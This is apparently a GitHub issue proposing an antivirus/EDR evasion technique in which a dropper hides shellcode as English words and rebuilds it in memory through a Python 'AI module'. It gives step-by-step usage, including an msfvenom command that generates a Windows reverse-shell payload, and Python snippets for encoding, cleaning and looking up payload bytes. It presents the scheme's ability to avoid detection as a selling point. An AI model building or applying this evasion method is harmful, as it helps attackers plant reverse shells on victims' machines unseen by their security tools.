
AV/EDR Evasion using AI driven payload Obfuscation

ghostpepper108 opened this issue 8 months ago · 2 comments


Authorship information

  • Name or nickname (required): ghost_pepper108
  • Twitter: https://twitter.com/ghost_pepper108

Technique Information

  • Technique title (required): AV/EDR Evasion using AI driven payload Obfuscation
  • Technique category (required): Antivirus/EDR Evasion
  • Technique description (required): Malware developers use plenty of techniques to hide their payloads. Some of the most common are obfuscating or encrypting the payload and deobfuscating/decrypting it just-in-time, when the payload has to be executed. This means the deobfuscation logic or decryption secrets are also normally inside the dropper. There is a serious drawback, though: obfuscating/encrypting increases the entropy of the malware binary significantly. This increase in entropy becomes a red flag in the prying eyes of EDRs/AVs. That means that even if the EDR/AV cannot read the encrypted/obfuscated payload, the binary gets flagged for further inspection because of its high entropy. As a result, malware authors attempt to use a variety of techniques to reduce the entropy.

Malware detection has evolved over time, and today's machine-learning (AI) based detection tools like EDRs are extremely powerful at detecting malicious activity because they are not based on static rules but are trained to detect malicious behaviors when a piece of code runs. This technique uses AI to evade the AI-based EDRs/AVs. With AI embedded in malware, things change a lot for both offensive and defensive security. It levels the field: it is no longer easy for EDRs/AVs to detect an AI-based malware.

TLDR: After the payload is generated by the AI module and the dropper is compiled with the AI-generated payload, the dropper is executed. The dropper connects to the AI module, sends the English words one by one, and the pre-trained model in the AI module uses a mathematical function to fetch the payload bytes from the vectors for those English words.
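As a minimal illustration of the core idea (not the actual Byte Viper model, whose learned embeddings are not shown here), each of the 256 possible byte values can be assigned a unique English-looking word, so the payload travels as innocuous text. The wordlist below is a hypothetical stand-in:

```python
# Toy sketch: assign each of the 256 possible byte values a unique
# English-looking word. The real project uses a pre-trained embedding
# model; this fixed wordlist is a hypothetical stand-in.
ADJ = ["dark", "pale", "calm", "bold", "cold", "warm", "soft", "loud",
       "fast", "slow", "tall", "thin", "gold", "blue", "gray", "deep"]
NOUN = ["fox", "owl", "cat", "dog", "elm", "oak", "sky", "sea",
        "sun", "moon", "hill", "lake", "rock", "leaf", "wind", "rain"]
WORDLIST = [a + n for a in ADJ for n in NOUN]  # 16 x 16 = 256 unique words

def encode_payload(hex_string: str) -> list[str]:
    """Map each payload byte to its word."""
    return [WORDLIST[b] for b in bytes.fromhex(hex_string)]

def decode_payload(words: list[str]) -> bytes:
    """Recover the original bytes from the word sequence."""
    index = {w: i for i, w in enumerate(WORDLIST)}
    return bytes(index[w] for w in words)

print(encode_payload("fc48"))  # two words, one per byte
```

Since every adjective is exactly four letters, each compound word splits unambiguously, so the mapping round-trips cleanly in both directions.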

This project contains the following files, explained below:

payload-generator.py: This is a payload generator created with the Byte Viper AI engine. It converts a raw hex payload (for example, msfvenom output) into its mathematical representation as vectors using the pre-trained machine-learning model. Here are the instructions on how to use it.

  1. Create a working payload. For instance, an msfvenom payload would be:

msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp lhost= lport= -f c

  • You would get something like \xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50.....
  • Remove all \x escapes and quotation marks so that you are left with fc4883e4f0e8c000000041514150.... Use this as your input in the next step
  • You will receive the AI-generated payload, which you embed in your code
  • A ".pkl" file will also be created that holds the vectors
  • Place this file in the same directory as your dropper binary
  • Also place payload.py in the same directory as your dropper
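The cleanup step above can be done programmatically. A small sketch (the buffer below is a short illustrative byte sequence, not a real payload):

```python
import re

def clean_msfvenom_c_output(raw: str) -> str:
    """Strip the C decoration (variable declaration, quotes, \\x escapes)
    from msfvenom -f c output, leaving only the bare hex characters."""
    return "".join(re.findall(r"\\x([0-9a-fA-F]{2})", raw)).lower()

raw = 'unsigned char buf[] = "\\xfc\\x48\\x83\\xe4\\xf0";'
print(clean_msfvenom_c_output(raw))  # fc4883e4f0
```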
  2. payload.py: This Python file goes along with your dropper binary. It contains the code to receive the English words from the dropper and fetch the equivalent hex code from the AI module.

  3. ByteViper.cpp: This C++ file is the dropper. It is just an example of how the payload is embedded, in a seemingly benign way, using English words. The code also connects to the AI module to get the raw hex code and then assembles it in memory one byte at a time, just before executing the payload. It can be modified to use many other techniques, including remote code injection.

  4. tasks.json: The VS Code configuration file used for compiling the code
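A hedged sketch of the lookup payload.py performs: the .pkl file is assumed to hold one vector per byte value, and a simple function maps a word's vector back to its byte. The real project uses learned embeddings; the toy vectors and word names (w00 through wff) here are illustrative stand-ins:

```python
import io
import pickle

# Toy vector table: each byte value b gets the word "w{b:02x}" and the
# 2-D vector (b, 255 - b). Real vectors would come from a trained model.
vectors = {f"w{b:02x}": (float(b), float(255 - b)) for b in range(256)}

buf = io.BytesIO()               # stands in for the .pkl file on disk
pickle.dump(vectors, buf)
buf.seek(0)
loaded = pickle.load(buf)

def word_to_byte(word: str) -> int:
    """Fetch the word's vector and recover the byte (first component)."""
    return int(loaded[word][0])

print(word_to_byte("wfc"))  # 252
```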

Pros

  1. The actual payload cannot be discovered because it is represented mathematically using vector embeddings
  2. There is no encryption/obfuscation of the payload, so the entropy of the malware remains low, equivalent to any benign binary
  3. The payload is represented as English words. One could potentially use any other language to represent the payload
  4. One could combine this with other techniques, such as digitally signing the binary or using alternative payload-injection methods
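The entropy claim above can be checked directly with Shannon entropy: encrypted data sits near 8 bits per byte, while a word-encoded payload stays in the range of ordinary English text. A small self-contained check (the sample strings are illustrative, not real payloads):

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 8 for encrypted/random data, much lower for text."""
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

encrypted_like = os.urandom(4096)                 # stands in for an encrypted payload
word_encoded = b"coldfox warmoak paleowl " * 200  # stands in for a word-encoded payload

print(shannon_entropy(encrypted_like))  # close to 8 bits/byte
print(shannon_entropy(word_encoded))    # text-like, well under 5 bits/byte
```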

Cons

  1. The AI module requires Python to be pre-installed on the target. This PoC was created using Python 3.11
  2. The AI module depends on other packages
  3. Performance is not great, but there are plenty of opportunities for improvement. For instance, the AI module checks on every run whether the required packages are installed; this is only needed on the first run

Additional resources

  • Add any external links that can provide further information of the technique.

Code snippets

  • Please add your code in separate files.

Detection rules

  • Please add your rules in separate files.

ghostpepper108 · May 28 '24 15:05